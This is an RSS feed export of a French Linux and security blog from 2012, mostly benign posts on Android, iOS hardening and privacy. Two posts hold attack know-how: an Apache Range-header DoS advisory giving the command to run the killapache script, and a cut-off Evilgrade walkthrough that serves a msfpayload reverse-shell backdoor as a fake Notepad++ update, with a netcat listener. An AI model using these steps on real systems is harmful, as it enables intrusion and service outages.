<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>
<channel>
	<title>K1dr3k</title>
	<atom:link href="http://kidrek.fr/blog/feed/" rel="self" type="application/rss+xml" />
	<link>http://kidrek.fr/blog</link>
	<description>Le blog d’un passionné de Linux et des produits OpenSource</description>
	<lastBuildDate>Sun, 22 Apr 2012 18:29:26 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.2</generator>
<xhtml:meta xmlns:xhtml="http://www.w3.org/1999/xhtml" name="robots" content="noindex" />
		<item>
		<title>Présidentielle &#8211; vous ne savez pas pour qui voter ?</title>
		<link>http://kidrek.fr/blog/dessin/prsidentielle-vous-ne-savez-pas-pour-qui-voter/</link>
		<comments>http://kidrek.fr/blog/dessin/prsidentielle-vous-ne-savez-pas-pour-qui-voter/#comments</comments>
		<pubDate>Sun, 22 Apr 2012 16:29:08 +0000</pubDate>
		<dc:creator>kidrek</dc:creator>
				<category><![CDATA[Dessin]]></category>
		<guid isPermaLink="false">http://kidrek.fr/blog/?p=1713</guid>
		<description><![CDATA[]]></description>
			<content:encoded><![CDATA[<p><img src="http://kidrek.fr/blog/wp-content/uploads/2012/04/vote.jpg" alt="" title="vote" width="90%" height="90%" class="aligncenter size-full wp-image-1714" /></p>
]]></content:encoded>
			<wfw:commentRss>http://kidrek.fr/blog/dessin/prsidentielle-vous-ne-savez-pas-pour-qui-voter/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Armitage &#8212; multiples instances clientes</title>
		<link>http://kidrek.fr/blog/securite/armitage-multiples-instances-clientes/</link>
		<comments>http://kidrek.fr/blog/securite/armitage-multiples-instances-clientes/#comments</comments>
		<pubDate>Wed, 04 Apr 2012 16:54:57 +0000</pubDate>
		<dc:creator>kidrek</dc:creator>
				<category><![CDATA[Sécurité]]></category>
		<guid isPermaLink="false">http://kidrek.fr/blog/?p=1702</guid>
		<description><![CDATA[Qui n&#8217;a jamais souhaité auditer une plateforme en équipe, et cela en se partageant les données recueillies et sessions obtenues, en temps réel. Et bien Armitage l&#8217;a réalisé. Armitage, qu&#8217;est ce ? Bon, voici une petite séance de rattrapage, Armitage est un projet qui a vu le jour de mémoire en 2010. Il a pour [...]]]></description>
			<content:encoded><![CDATA[<p>
<img src="http://kidrek.fr/blog/wp-content/uploads/2012/04/armitage.gif" alt="" title="armitage" width="64" height="64" class="alignleft size-full wp-image-1703" /><br />
Qui n&#8217;a jamais souhaité auditer une plateforme en équipe, et cela en se partageant les données recueillies et sessions obtenues, en temps réel.</p>
<p>Et bien Armitage l&#8217;a réalisé.</p>
<p>Armitage, qu&#8217;est ce ? <img src='http://kidrek.fr/blog/wp-includes/images/smilies/icon_wink.gif' alt=';-)' class='wp-smiley' /><br />
Bon, voici une petite séance de rattrapage, Armitage est un projet qui a vu le jour de mémoire en 2010.<br />
Il a pour but, d&#8217;apporter une interface graphique au framework Metasploit, afin de faciliter l&#8217;audit(pentest) de plateforme.<br />
Pour ceux qui travaille avec Metasploit, et qui ne sont pas &laquo;&nbsp;fan&nbsp;&raquo; du travail au sein d&#8217;une console, armitage est une vraie plus value.</p>
<p>Ce produit est très interessant et performant.<br />
Il permet d&#8217;avoir meilleure gestion de la plateforme cible, et cela à travers une vision globale de l&#8217;avancement des exploits(prise de controle à distance).
</p>
<p>Dans cet article, nous n&#8217;aborderons pas l&#8217;installation ni la prise en main de ce produit qui fait désormais partie intégrante du Framework Metasploit. </p>
<p>Nous détaillerons plutot les étapes à effectuer pour préparer l&#8217;audit de plateforme à travers plusieurs clients armitage.</p>
<p>Pour ce faire, les instances (client) armitage se connecteront sur un serveur metasploit central qui servira de relay pour executer les scans, les exploits, pour ensuite collecter les résultats. </p>
<p><span id="more-1702"></span></p>
<p>
&nbsp;
</p>
<p><img src="http://kidrek.fr/blog/wp-content/uploads/2012/04/armitage_multi_client.png" alt="" title="armitage_multi_client" width="687" height="274" class="aligncenter size-full wp-image-1705" /></p>
<p>
&nbsp;
</p>
<p>Une fois ceux-ci obtenus, ils seront accessibles de tous les clients armitage connectés au serveur Metasploit RPC, pour progresser davantage dans l&#8217;audit.</p>
<p>source : http://www.fastandeasyhacking.com/manual#multi
</p>
<p>
&nbsp;
</p>
<h2>1/ Mise en place du serveur Metasploit RPC, et du serveur armitage central.</h2>
<p>
Pour cet exemple, le serveur aura pour nom &laquo;&nbsp;srv-armitage&nbsp;&raquo; et adresse IP &laquo;&nbsp;192.168.0.4&#8243;.</p>
<pre class="brush: bash;">
# msfrpcd -f -U msf -P password -t basic
with    -f specify to run daemon
        -U user_instance
        -P password_instance
        -t
</pre>
<p>
&nbsp;
</p>
<pre class="brush: bash;">
# armitage --server 192.168.0.4 55553 msf password
with    192.168.0.4 @ip_metasploit_instance
        55553 : port of metasploit_instance
        msf : user of metasploit_instance
        password : password of metasploit_instance
</pre>
<p>
&nbsp;
</p>
<p>Une fois ces commandes effectuées, sans erreur [...], le serveur est donc opérationnel et prêt à accueillir des connexions de clients armitage.<br />
Vous pouvez vérifier le bon fonctionnement du serveur avec la commande &laquo;&nbsp;netstat&nbsp;&raquo; et &laquo;&nbsp;ps&nbsp;&raquo;.
</p>
<pre class="brush: bash;">
# netstat -ntpl
</pre>
<p>
&#8211;> vérification de l&#8217;écoute du système sur le port 55553 et le socket ip 0.0.0.0
</p>
<pre class="brush: bash;">
# ps -aux | grep msfrpcd
# ps -aux | grep armitage
</pre>
<p>
&#8211;> vérification de l&#8217;exécution des processus lancés précédemment.
</p>
<p>
&nbsp;
</p>
<p><H2>2/ Connexion des clients armitage</H2></p>
<p>
La deuxième étape consiste en l&#8217;établissement des connexions de clients armitage.<br />
Cette partie peut être réalisée sur n&#8217;importe quel ordinateur du réseau.
</p>
<p>
&nbsp;
</p>
<pre class="brush: bash;">
# armitage
</pre>
<p>
&#8211;> Lancement du produit armitage à travers la commande &laquo;&nbsp;# armitage&nbsp;&raquo;.<br />
A l&#8217;affichage de la popup de connexion, vous n&#8217;avez plus qu&#8217;à saisir les informations définies précédemment lors de l&#8217;initialisation du serveur &laquo;&nbsp;Metasploit RPC&nbsp;&raquo;.
</p>
<p>
@IP : 192.168.0.4<br />
user : msf<br />
pass : password
</p>
<p>
&nbsp;
</p>
<p><img src="http://kidrek.fr/blog/wp-content/uploads/2012/04/armitage_connexion.png" alt="" title="armitage_connexion" width="318" height="213" class="aligncenter size-full wp-image-1706" /></p>
<p>
&nbsp;
</p>
<p>
Vous pouvez désormais distribuer le travail à effectuer à vos petits jeunes, pendant que vous regarderez le bon déroulement des opérations sur votre instance <img src='http://kidrek.fr/blog/wp-includes/images/smilies/icon_wink.gif' alt=';-)' class='wp-smiley' /> .</p>
]]></content:encoded>
			<wfw:commentRss>http://kidrek.fr/blog/securite/armitage-multiples-instances-clientes/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>IOS 5 &#8211; Hardening guide by Australian government</title>
		<link>http://kidrek.fr/blog/securite/ios-5-hardening-guide/</link>
		<comments>http://kidrek.fr/blog/securite/ios-5-hardening-guide/#comments</comments>
		<pubDate>Mon, 02 Apr 2012 20:30:33 +0000</pubDate>
		<dc:creator>kidrek</dc:creator>
				<category><![CDATA[Sécurité]]></category>
		<guid isPermaLink="false">http://kidrek.fr/blog/?p=1698</guid>
		<description><![CDATA[You can find in this ebook, some guideline to increase security on your iphone or ipad. The Australian government explains in few chapters risk, and how harden IOS security. - Protect data with encryption on IOS - Suggested policies - Recommanded settings (passcode length, immediate device lock, allow installing app, etc &#8230; ) - risk [...]]]></description>
			<content:encoded><![CDATA[<p><img src="http://kidrek.fr/blog/wp-content/uploads/2008/12/ios5.jpg" alt="" title="ios5" width="400" height="200" align="center"/></p>
<p>You can find in this ebook, some guideline to increase security on your iphone or ipad.<br />
The Australian government explains in few chapters risk, and how harden IOS security.</p>
<p>- Protect data with encryption on IOS<br />
- Suggested policies<br />
- Recommanded settings (passcode length, immediate device lock, allow installing app, etc &#8230; )<br />
- risk incurred</p>
<p>To conclude, this hardening guide is very comprehensive and describes risks in the field of information and the basic reflexes to acquire.</p>
<p>Happy reading</p>
<p><< <a href='http://kidrek.fr/blog/wp-content/uploads/2008/12/iOS5_Hardening_Guide.pdf' target="_blank">iOS5_Hardening_Guide</a> >></p>
]]></content:encoded>
			<wfw:commentRss>http://kidrek.fr/blog/securite/ios-5-hardening-guide/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Android app &#8211; BattleField3 Widget</title>
		<link>http://kidrek.fr/blog/android/android-app-battlefield3-widget/</link>
		<comments>http://kidrek.fr/blog/android/android-app-battlefield3-widget/#comments</comments>
		<pubDate>Sun, 18 Dec 2011 10:28:10 +0000</pubDate>
		<dc:creator>kidrek</dc:creator>
				<category><![CDATA[Android]]></category>
		<guid isPermaLink="false">http://kidrek.fr/blog/?p=1695</guid>
		<description><![CDATA[Ayant profité de la sortie de BattleField3, je me suis lancé avant d&#8217;avoir le jeu dans l&#8217;optique de créer un Widget permettant de garder un oeil sur l&#8217;évolution des stats de notre escouade. Après quelques semaines de développement, je vous livre un premier jet de l&#8217;application. &#160; 1/ Description Donc voici le principe, il s&#8217;agit [...]]]></description>
			<content:encoded><![CDATA[<p><img src="http://kidrek.fr/blog/wp-content/uploads/2010/11/android_kidrek_logo.jpg" alt="" title="android_kidrek_logo" width="60" height="34" class="alignleft size-full wp-image-1616" /></p>
<p>Ayant profité de la sortie de BattleField3, je me suis lancé avant d&#8217;avoir le jeu <img src='http://kidrek.fr/blog/wp-includes/images/smilies/icon_wink.gif' alt=';-)' class='wp-smiley' />  dans l&#8217;optique de créer un Widget permettant de garder un oeil sur l&#8217;évolution des stats de notre escouade.</p>
<p>Après quelques semaines de développement, je vous livre un premier jet de l&#8217;application.
</p>
<p>&nbsp;</p>
<p><span id="more-1695"></span></p>
<p><H2>1/ Description </H2></p>
<p>Donc voici le principe, il s&#8217;agit d&#8217;un widget dédié à afficher les statistiques des joueurs sous BattleField3. Vous pouvez en stockez autant que vous le souhaitez sur votre desktop, il n&#8217;y aucune restriction.</p>
<p>&nbsp;</p>
<p><H2>2/ Fonctionnement </H2></p>
<p>Une fois le widget ajouté, vous cliquez dessus et vous obtenez une popup ou vous devez saisir le pseudo du joueur dont vous souhaitez obtenir les stats. Puis sur l&#8217;image disquette pour sauvegarder. A l&#8217;issue, la première synchro va s&#8217;effectuer.</p>
<p>si vous souhaitez forcer une mise à jour de stats, vous pouvez le faire à travers le bouton du milieu avec les flèches en arc de cercle.</p>
<p>Site de référence : battlelog, du coup, aucun besoin de s&#8217;authentifier en amont.<br />
La fréquence de mise à jour est de 1 par heure. ( à optimiser au mieux dans une version finale )<br />
Système de Cache : J&#8217;ai mis en place un système de cache pour les images des grades, donc ne vous étonnez pas si dans les permissions, il y a apparaît la nécessité d&#8217;accéder à la sd card. Toutes les images des &laquo;&nbsp;rank&nbsp;&raquo; seront stockés au fur et à mesure du besoin dans un répertoire, cela permet d&#8217;éviter l&#8217;utilisation de la bande passante pour télécharger 2 fois la même image, car 2 joueurs sont au même rank.</p>
<p>N&#8217;ayez pas peur, si la première synchro est lente c&#8217;est normale, il y a une phase de récupération de Battlelog ID en fonction du pseudo.<br />
Un conseil essayer de faire le premier ajout des widgets dans un endroit ou vous captez le signal 3g/wifi pour vous éviter toute attente.</p>
<p>&nbsp;</p>
<p><H2>3/ Conclusion </H2></p>
<p>Si ce widget vous intéresse, faites vous plaisir, et n&#8217;hésitez pas à me faire remonter vos critiques.</p>
<p>&nbsp;</p>
<p>Vous pouvez la télécharger sur le market à l&#8217;URL suivante :<br />
<a href="http://market.android.com/details?id=org.kidrek.bf3stats" target="_blank">BF3STATS_WIDGET</a>
</p>
<p><img src="http://kidrek.fr/blog/wp-content/uploads/2011/12/bf3stats_widget_1.png" class="alignleft"><img src="http://kidrek.fr/blog/wp-content/uploads/2011/12/bf3stats_widget_2.png" class="alignleft"></p>
]]></content:encoded>
			<wfw:commentRss>http://kidrek.fr/blog/android/android-app-battlefield3-widget/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Android &#8211; Tester la connectivité à internet</title>
		<link>http://kidrek.fr/blog/android/android-tester-connectivit-internet/</link>
		<comments>http://kidrek.fr/blog/android/android-tester-connectivit-internet/#comments</comments>
		<pubDate>Fri, 25 Nov 2011 20:23:09 +0000</pubDate>
		<dc:creator>kidrek</dc:creator>
				<category><![CDATA[Android]]></category>
		<guid isPermaLink="false">http://kidrek.fr/blog/?p=1693</guid>
		<description><![CDATA[Voici une fonction qui permet, lorsque l&#8217;on développe une application qui requiert un accès à internet, de contrôler si le smartphone y est connecté. source : http://www.vogella.de/blog/ Il s&#8217;agit d&#8217;un très bon blog orienté développement d&#8217;application java, d&#8217;où android. &#160; &#160; Code source de la fonction public static boolean isNetworkAvailable() { ConnectivityManager cm = (ConnectivityManager) [...]]]></description>
			<content:encoded><![CDATA[<p><img class="alignleft size-full wp-image-1616" title="android_kidrek_logo" src="http://kidrek.fr/blog/wp-content/uploads/2010/11/android_kidrek_logo.jpg" alt="" width="60" height="34" /> Voici une fonction qui permet, lorsque l&#8217;on développe une application qui requiert un accès à internet, de contrôler si le smartphone y est connecté.</p>
<p><strong>source :</strong> <a href="http://www.vogella.de/blog/" target="_blank">http://www.vogella.de/blog/</a><br />
Il s&#8217;agit d&#8217;un très bon blog orienté développement d&#8217;application java, d&#8217;où android.<br />
&nbsp;<br />
&nbsp;
</p>
<p><span id="more-1693"></span></p>
<p>Code source de la fonction</p>
<pre class="brush: java;">
public static boolean isNetworkAvailable() {
  ConnectivityManager cm = (ConnectivityManager) application_context.getSystemService(Context.CONNECTIVITY_SERVICE);
  NetworkInfo networkInfo = cm.getActiveNetworkInfo();
  // if no network is available networkInfo will be null, otherwise check if we are connected
  if (networkInfo != null &amp;&amp; networkInfo.isConnected()) {
    return true;
  }
  return false;
}
</pre>
<p>&nbsp;</p>
<p>N&#8217;oubliez pas de rajouter la demande de permissions au fichier &laquo;&nbsp;AndroidManifest.xml&nbsp;&raquo;, comme ci-dessous.</p>
<pre class="brush: java;">
    &lt;uses-permission android:name=&quot;android.permission.ACCESS_NETWORK_STATE&quot;&gt;&lt;/uses-permission&gt;
</pre>
]]></content:encoded>
			<wfw:commentRss>http://kidrek.fr/blog/android/android-tester-connectivit-internet/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Iphone Sécurité &#8211; les bonnes pratiques par McAfee</title>
		<link>http://kidrek.fr/blog/securite/iphone-scurit-les-10-bonnes-pratiques/</link>
		<comments>http://kidrek.fr/blog/securite/iphone-scurit-les-10-bonnes-pratiques/#comments</comments>
		<pubDate>Fri, 25 Nov 2011 19:33:52 +0000</pubDate>
		<dc:creator>kidrek</dc:creator>
				<category><![CDATA[Sécurité]]></category>
		<guid isPermaLink="false">http://kidrek.fr/blog/?p=1691</guid>
		<description><![CDATA[McAfee a publié un fichier pdf, comprenant les bonnes pratiques à mettre en place au sein de son Iphone pour y assurer un minimum de sécurité. Vous y trouverez de nombreuses astuces auxquelles nous ne ferions pas attention habituellement, mais qui pourraient nous protéger de personnes malintentionnées. Prenez quelques minutes pour les lire, je vous [...]]]></description>
			<content:encoded><![CDATA[<p>McAfee a publié un fichier pdf, comprenant les bonnes pratiques à mettre en place au sein de son Iphone pour y assurer un minimum de sécurité.</p>
<p>Vous y trouverez de nombreuses astuces auxquelles nous ne ferions pas attention habituellement, mais qui pourraient nous protéger de personnes malintentionnées.</p>
<p>Prenez quelques minutes pour les lire, je vous assure que ce fichier est très intéressant.<br />
Même s&#8217;il aborde plus particulièrement l&#8217;iphone, ces bonnes pratiques peuvent très bien s&#8217;adapter au système Android (notamment pour l&#8217;utilisation de son smartphone sur des hotspots  gratuits qui sont la cible la plus facile pour pouvoir intercepter vos données).</p>
<p>Bonne lecture en anglais ( pour l&#8217;instant, je vais essayer de prendre un peu de temps pour le traduire ).</p>
<p><center><img src="http://kidrek.fr/blog/wp-content/uploads/2011/11/mcafee.png" alt="" title="mcafee" width="128" height="153" class="aligncenter size-full wp-image-1692" /></center><br />
<span id="more-1691"></span></p>
<p>&nbsp;</p>
<p>Voici la liste des astuces :</p>
<p><strong>Astuce 1:</strong> Activer le contrôle par code secret pour déverrouiller votre téléphone.</p>
<p><strong>Astuce 2:</strong> Désactiver fonctionnalités qui pourraient être accédées sans entrer le code ( avec notamment la désactivation de l&#8217;affichage des SMS lors de leur réception ).</p>
<p><strong>Astuce 3:</strong> Pallier les problèmes de sécurité intégré au sein de l&#8217;IOS ( par exemple le cache du clavier )</p>
<p><strong>Astuce 4:</strong> Supprimer toutes les données avant de mettre son téléphone en réparation, revente</p>
<p><strong>Astuce 5:</strong> Mettre à jour régulièrement sont ISO</p>
<p><strong>Astuce 6:</strong> Jailbreak or Not, that is the question ? <img src='http://kidrek.fr/blog/wp-includes/images/smilies/icon_wink.gif' alt=';-)' class='wp-smiley' /> </p>
<p><strong>Astuce 7:</strong> Activer les paramètres de sécurité sur le navigateur Safari</p>
<p><strong>Astuce 8:</strong> Utiliser de manière sécurisée le Bluetooth, le Wi-Fi, et la messagerie EMAIL</p>
<p><strong>Astuce 9:</strong> Activer les &laquo;&nbsp;Restrictions&nbsp;&raquo;</p>
<p><strong>Astuce 10:</strong> Et enfin, activer l&#8217;application &laquo;&nbsp;Find My iPhone&nbsp;&raquo;</p>
</p>
<p>&nbsp;</p>
<p>Je vous invite à télécharger le fichier pour y trouver toutes les indications (captures d&#8217;écran) afin de les appliquer.</p>
<p><a href="http://www.mcafee.com/us/resources/white-papers/foundstone/wp-top-10-iphone-security-tips.pdf" target="_blank">Vous le trouverez à cet URL</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://kidrek.fr/blog/securite/iphone-scurit-les-10-bonnes-pratiques/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Préserver son anonymat sur Internet avec l&#8217;extension Ghostery !!!</title>
		<link>http://kidrek.fr/blog/securite/preserver-son-anonymat-sur-internet/</link>
		<comments>http://kidrek.fr/blog/securite/preserver-son-anonymat-sur-internet/#comments</comments>
		<pubDate>Fri, 25 Nov 2011 17:54:12 +0000</pubDate>
		<dc:creator>kidrek</dc:creator>
				<category><![CDATA[Sécurité]]></category>
		<guid isPermaLink="false">http://kidrek.fr/blog/?p=1689</guid>
		<description><![CDATA[Source : http://www.ghostery.com/ &#160; Présentation Voici une extension qui prend de plus en plus d&#8217;ampleur au sein des internautes ces dernières semaines &#171;&#160;ghostery&#160;&#187;. Elle a pour particularité de bloquer les différentes créations de cookies initiées à votre insu sur tous les sites commerciaux/blog/reseaux sociaux, sur lesquels vous naviguez. &#160; Utilité Quel est l&#8217;interet me direz [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.ghostery.com/"><img src="http://kidrek.fr/blog/wp-content/uploads/2011/11/Ghostery-Logo.png" alt="" title="Ghostery-Logo" width="211" height="48" class="aligncenter size-full wp-image-1690" /></a><br />
Source : http://www.ghostery.com/</p>
<p>
&nbsp;</p>
<p><H2>Présentation</H2></p>
<p>Voici une extension qui prend de plus en plus d&#8217;ampleur au sein des internautes ces dernières semaines &laquo;&nbsp;ghostery&nbsp;&raquo;.<br />
Elle a pour particularité de bloquer les différentes créations de cookies initiées à votre insu sur tous les sites commerciaux/blog/reseaux sociaux, sur lesquels vous naviguez.</p>
<p>&nbsp;</p>
<p><span id="more-1689"></span></p>
<p><H2>Utilité</H2></p>
<p>Quel est l&#8217;interet me direz vous ?<br />
Tous ces sites ont depuis peu implémenté le fameux &laquo;&nbsp;like&nbsp;&raquo; de Facebook, ou &laquo;&nbsp;+1&#8243; de Google. Ces images ne sont pas anodines et permettent de vous identifier de manière unique à travers un cookie tout au long de votre navigation sur internet.</p>
<p>Ces données vont ensuite être traitées par les services de publicité. C&#8217;est ce que l&#8217;on appelle de la publicité &laquo;&nbsp;Ciblée&nbsp;&raquo; !!!</p>
<p>&nbsp;</p>
<p><H2>Ou la trouver ?</H2></p>
<p>L&#8217;extension &laquo;&nbsp;Ghostery&nbsp;&raquo; est présente sur la plupart des navigateurs tels que Firefox, Chrome, Opéra et même Safari.</p>
<p>Allez vite la <a href="http://www.ghostery.com/download" target=""_blank">télécharger</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://kidrek.fr/blog/securite/preserver-son-anonymat-sur-internet/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>[Vulnerability - Apache2] &#8212; HEAD RANGE</title>
		<link>http://kidrek.fr/blog/securite/vulnerability-apache2-head-range/</link>
		<comments>http://kidrek.fr/blog/securite/vulnerability-apache2-head-range/#comments</comments>
		<pubDate>Sat, 27 Aug 2011 09:26:01 +0000</pubDate>
		<dc:creator>kidrek</dc:creator>
				<category><![CDATA[Sécurité]]></category>
		<guid isPermaLink="false">http://kidrek.fr/blog/?p=1685</guid>
		<description><![CDATA[Versions cibles : Toutes les version apache 1.3 et 2.x Risque : DOS sur le service apache + système Le 24 aout dernier a été publiée une vulnérabilité sur le service APACHE WEB. Celle-ci concerne toutes les versions d&#8217;apache 1.3 et 2, autant dire toutes Description de la vulnérabilité Pour la petite explication, la vulnérabilité [...]]]></description>
			<content:encoded><![CDATA[<p><img src="http://kidrek.fr/blog/wp-content/uploads/2011/08/apache.jpg" alt="" title="apache" width="96" height="95" class="alignleft size-full wp-image-1686" /><br />
<b>Versions cibles : Toutes les version apache 1.3 et 2.x</b><br />
<b>Risque : DOS sur le service apache + système </b></p>
<p><span id="more-1685"></span></p>
<p><br/><br />
<br/><br />
<br/><br />
<br/></p>
<p>Le 24 aout dernier a été publiée une vulnérabilité sur le service APACHE WEB. Celle-ci concerne toutes les versions d&#8217;apache 1.3 et 2, autant dire toutes <img src='http://kidrek.fr/blog/wp-includes/images/smilies/icon_wink.gif' alt=';-)' class='wp-smiley' />
</p>
<p><H2>Description de la vulnérabilité</H2></p>
<p>Pour la petite explication, la vulnérabilité se situe au niveau des entêtes HTTP sur le champ RANGE. Ce champ est utilisé lors de téléchargement de fichier sur un serveur HTTP pour segmenter celui-ci en de multiples parties de petite taille. Avec cette vulnérabilité, le champ est formatté avec un nombre incalculable d&#8217;interval (RANGE) de grande taille, ce qui provoque un DOS (Deny Of Service), et le serveur cible devient inaccessible durant l&#8217;attaque.</p>
<p>&nbsp;</p>
<p><H2>Test de la vulnérabilité</H2></p>
<p>Pour les administrateurs Système et Sécurité, vous pourrez tester vos plateformes avec l&#8217;outil suivant : <a href="http://seclists.org/fulldisclosure/2011/Aug/att-175/killapache_pl.bin" target="_blank">killapache</a>.<br />
Il s&#8217;agit d&#8217;un script perl qui va formatter une requête HTTP de manière à identifier un serveur vulnérable.<br />
Le script nécessitera l&#8217;installation d&#8217;une dépendance pour l&#8217;exécution du script en de multiple thread.
</p>
<pre class="brush: bash;">
# apt-get install libparallel-forkmanager-perl
# ./killapache_pl.bin $hostname $nb_fork
</pre>
<p>&nbsp;</p>
<p><H2>Solutions palliatives</H2></p>
<p>
Quelques solutions ont été trouvées pour pallier ce problème en attendant les mises à jour.</p>
<p>- <b>1ère Action</b> : limiter la longueur des entêtes, en ajoutant la ligne ci-dessous dans le vhost du site.</p>
<pre class="brush: bash;">
LimitRequestFieldSize 200
</pre>
<p>- <b>2nde Action</b> : Créer une RewriteRule qui limitera le nombre de &#8216;RANGE&#8217; dans les entêtes.</p>
<pre class="brush: bash;">
RewriteEngine on
RewriteCond %{HTTP:range} !(^bytes=[^,]+(,[^,]+){0,4}$|^$)
RewriteRule .* – [F]
</pre>
<p>- <b>Dernière Action</b> qui prendra du temps, mais permettra d&#8217;obtenir des résultats en terme de sécurité inégalables : <b>l&#8217;installation du module <a href="http://www.modsecurity.org/" target="_blank">MODSECURITY</a></b>.</p>
]]></content:encoded>
			<wfw:commentRss>http://kidrek.fr/blog/securite/vulnerability-apache2-head-range/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Sécurité &#8212; Evilgrade Framework + BackTrack</title>
		<link>http://kidrek.fr/blog/linux-securite/security-evilgrade/</link>
		<comments>http://kidrek.fr/blog/linux-securite/security-evilgrade/#comments</comments>
		<pubDate>Mon, 15 Aug 2011 14:56:38 +0000</pubDate>
		<dc:creator>kidrek</dc:creator>
				<category><![CDATA[Linux - Admin]]></category>
		<category><![CDATA[Linux - Sécurité]]></category>
		<category><![CDATA[Sécurité]]></category>
		<guid isPermaLink="false">http://kidrek.fr/blog/?p=1682</guid>
		<description><![CDATA[En ce jour, je vais vous faire part de mon expérience concernant un logiciel usurpant l&#8217;identité des différents éditeurs de logiciels afin d&#8217;informer ceux-ci d&#8217;une nouvelle mise à jour disponible. Dès lors que le logiciel lance sa mise à jour, une backdoor est envoyée en lieu et place de l&#8217;update, une connexion sur le pc [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://lauzeanique.pointblog.fr/dessin-ninja.html" target="_blank"><img src="http://kidrek.fr/blog/wp-content/uploads/2011/08/ninja_blog.png" alt="White Ninja" title="White Ninja" width="73" height="97" class="alignleft size-full wp-image-1683" /></a>
<p>En ce jour, je vais vous faire part de mon expérience concernant un logiciel usurpant l&#8217;identité des différents éditeurs de logiciels afin d&#8217;informer ceux-ci d&#8217;une nouvelle mise à jour disponible. Dès lors que le logiciel lance sa mise à jour, une backdoor est envoyée en lieu et place de l&#8217;update, une connexion sur le pc cible est alors créée pour le plus grand bonheur d&#8217;une personne malveillante.</p>
</p>
<p>Le but de cet article est de sensibiliser les administrateurs système et sécurité des entreprises aux différentes possibilité offertes à une personne malveillante au sein de votre réseau. !!
</p>
<p><span id="more-1682"></span><br />
<H2>Introduction</H2></p>
<p>Le produit qui offre toutes ces possibilités est <b>Evilgrade</b> édité par : <a href="http://www.infobytesec.com/" target="_blank">Infobytesec</a>.<br />
Cet outil est un framework se présentant de la même manière que metasploit sous forme de console, et offrant une multitude de module en fonction du logiciel cible souhaité.<br />
Les modules présents sont :<br />
- opera<br />
- itunes<br />
- quicktime<br />
- winamp<br />
- notepad ++<br />
- etc &#8230;</p>
<p>Aujourd&#8217;hui nous allons nous intéresser à <b>Notepad++</b>.</p>
<p>&nbsp;<br />
<H2>Pré-requis</H2></p>
<p>Afin de prévenir quelques erreurs lors de la compilation de <b>Evilgrade</b>, vérifions que le module perl dump est présent au sein du système.
</p>
<pre class="brush: bash;">
root@bt:# cpan Data::Dump
</pre>
<p>Une fois le module dump installé, nous allons récupérer les sources du framework Evilgrade sur le site de son éditeur.</p>
<pre class="brush: bash;">
root@bt:# tar xvzf isr-evilgrade-2.0.0.tar.gz
root@bt:# cd isr-evilgrade/
</pre>
<p>et voilà l&#8217;installation est terminée.</p>
<p>Pour les pré-requis, il ne manque plus que le paquet <b>dnsspoof</b> présent au sein de <b>dsniff</b>.</p>
<pre class="brush: bash;">
root@bt:# apt-get install dsniff
</pre>
<p>&nbsp;</p>
<h2>Evilgrade en action</h2>
<p>Nous allons maintenant pouvoir tester evilgrade, pour ce faire &laquo;&nbsp;mettons nous en situation&nbsp;&raquo;.</p>
<pre class="brush: bash;">
root@bt:~/Desktop/isr-evilgrade# ./evilgrade
            _ _                     _
           (_) |                   | |
  _____   ___| | __ _ _ __ __ _  __| | ___
 / _ \ \ / / | |/ _` | '__/ _` |/ _` |/ _ \
|  __/\ V /| | | (_| | | | (_| | (_| |  __/
 \___| \_/ |_|_|\__, |_|  \__,_|\__,_|\___|
                __/ |
                |___/
-------------------------------------------
---------------------  www.infobytesec.com
- 63 modules available.
evilgrade&gt;
</pre>
<p>Une fois lancé, nous allons charger le module <b>notepad++</b> afin de le configurer.</p>
<pre class="brush: bash;">
evilgrade&gt; conf notepadplus
</pre>
<p>Vous pouvez d&#8217;ailleurs consulter toutes les options offertes par ce module.</p>
<pre class="brush: bash;">
evilgrade(notepadplus)&gt;show options
Display options:
===============
Name = notepadplus
Version = 1.0
Author = [&quot;Francisco Amato &lt; famato +[AT]+ infobytesec.com&gt;&quot;]
Description = &quot;The notepad++ use GUP generic update process so it''s boggy too.&quot;
VirtualHost = &quot;notepad-plus.sourceforge.net&quot;
.----------------------------------------------.
| Name   | Default           | Description     |
+--------+-------------------+-----------------+
| enable |                 1 | Status          |
| agent  | ./agent/agent.exe | Agent to inject |
'--------+-------------------+-----------------'
</pre>
<p>Nous allons modifier l&#8217;agent afin que celui-ci pointe sur une backdoor générée par metasploit.</p>
<pre class="brush: bash; toolbar: true;">
evilgrade(notepadplus)&gt; set agent '[&quot;/pentest/exploits/framework3/msfpayload windows/shell_reverse_tcp
                        LHOST=10.0.0.1 LPORT=1234 X &gt; &lt;%OUT%&gt;/tmp/notepadplus.exe&lt;%OUT%&gt;&quot;]'
</pre>
<p>A vous de modifier les variables avec vos propres valeurs.<br />
Une fois tout ceci effectué, il ne nous reste plus qu&#8217;à lancer le serveur web et dns.</p>
<pre class="brush: bash;">
evilgrade(notepadplus)&gt; start
</pre>
<p>Maintenant que le backdoor est en place avec un reverse tcp sur le port 1234, nous devons lancer netcat en écoute pour pouvoir ensuite intéragir  sur la session du poste cible.</p>
<pre class="brush: bash;">
root@bt:# nc -l -v -p 1234
</pre>
